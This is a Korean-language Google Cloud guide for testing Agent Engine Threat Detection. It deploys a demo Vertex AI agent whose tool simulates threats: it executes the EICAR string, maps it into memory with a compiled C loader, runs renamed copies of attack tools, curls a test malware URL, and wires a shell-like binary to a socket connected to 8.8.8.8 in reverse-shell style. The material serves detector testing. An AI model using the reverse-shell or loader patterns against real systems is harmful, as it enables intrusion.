이 페이지에서는 의도적으로 감지기를 트리거하고 발견 항목을 확인하여 Agent Engine Threat Detection이 작동하는지 확인하는 방법을 설명합니다. Agent Engine Threat Detection은 Security Command Center의 기본 제공 서비스입니다.
시작하기 전에
Vertex AI Agent Engine 에이전트에 대한 잠재적 위협을 감지하려면 Security Command Center에서 Agent Engine Threat Detection 서비스가 사용 설정되어 있는지 확인하세요.
환경 설정
Agent Engine Threat Detection을 테스트하려면 악의적인 활동을 시뮬레이션하는 데모 에이전트를 설정하세요.
프로젝트를 만들고 셸 활성화
테스트에 사용할 Google Cloud 프로젝트를 선택하거나 만듭니다.
감지기를 테스트하려면 Google Cloud 콘솔과 Cloud Shell을 사용하면 됩니다.
Google Cloud 콘솔로 이동합니다.
테스트에 사용할 프로젝트를 선택합니다.
Cloud Shell 활성화를 클릭합니다.
로컬 셸에서 테스트 안내를 실행할 수도 있습니다.
Vertex AI Agent Engine 설정
이 프로젝트에서 Vertex AI Agent Engine을 이전에 사용한 적이 없는 경우 시작하기 전에 Vertex AI Agent Engine 환경을 설정하세요. 생성한 Cloud Storage 스테이징 버킷의 이름을 기록합니다. 또한 Vertex AI Agent Engine 빠른 시작을 따라 Vertex AI SDK로 에이전트를 개발하고 배포하는 방법을 알아보는 것이 좋습니다.
테스트 스크립트 만들기
테스트를 위해 새 에이전트를 배포하는 데 사용될 여러 파일을 만듭니다. nano과 같은 텍스트 편집기를 사용하세요.
다음 콘텐츠로
requirements.txt라는 새 파일을 만듭니다.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticinstallation_scripts/install.sh라는 새 빈 파일을 만듭니다. 일부 테스트에서는 이 파일에 콘텐츠를 추가해야 합니다.다음 콘텐츠로
main.py라는 새 파일을 만듭니다.PROJECT_ID,LOCATION,STAGING_BUCKET변수를 바꿉니다. 스테이징 버킷 이름에gs://프리픽스가 포함되어야 합니다.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
가상 환경 설정
Python 가상 환경을 만들고 활성화합니다.
python3 -m venv env source env/bin/activate가상 환경에 필요한 종속 항목을 설치합니다.
pip install -r requirements.txt
스크립트 테스트
가상 환경 내에서 python3 main.py를 사용하여 스크립트를 실행합니다.
이 명령어는 테스트 에이전트를 빌드, 배포, 실행하는 데 몇 분 정도 걸립니다.
스크립트는 배포된 에이전트의 리소스 이름과 LLM 응답 및 기타 메타데이터를 포함한 몇 가지 JSON 객체를 출력합니다. 이 단계에서 권한 오류나 배포 오류가 발생하면 문제 해결을 참고하여 다음 단계를 진행하세요.
테스트 감지기
Agent Engine 위협 감지 감지기를 테스트하려면 threat_detection_test 함수의 코드를 공격을 시뮬레이션하는 코드로 바꿉니다. 스크립트가 에이전트를 배포하고 쿼리하는 데 시간이 오래 걸릴 수 있습니다. 테스트 속도를 높이려면 이러한 함수의 콘텐츠를 여러 개 결합하면 됩니다.
실행: 추가된 악성 바이너리 실행됨
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
실행: 추가된 악성 라이브러리가 로드됨
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다. Vertex AI SDK에서 응답 파싱에 관한 오류가 표시될 수 있지만 발견 결과는 계속 생성됩니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
실행: 컨테이너 이스케이프
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
실행: Kubernetes 공격 도구 실행
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
실행: 로컬 정탐 도구 실행
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
실행: 수정된 악성 바이너리 실행됨
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
실행: 수정된 악성 라이브러리가 로드됨
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
악성 URL 모니터링됨
다음 콘텐츠로 installation_scripts/install.sh 파일을 업데이트합니다.
#!/bin/bash
apt-get install -y curl --no-install-recommends
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
역방향 셸
테스트 스크립트에서 threat_detection_test 함수를 바꾼 다음 테스트 스크립트를 실행합니다.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
다음 단계
- Agent Engine Threat Detection에 대해 자세히 알아보세요.
- Agent Engine Threat Detection 사용 방법 알아보기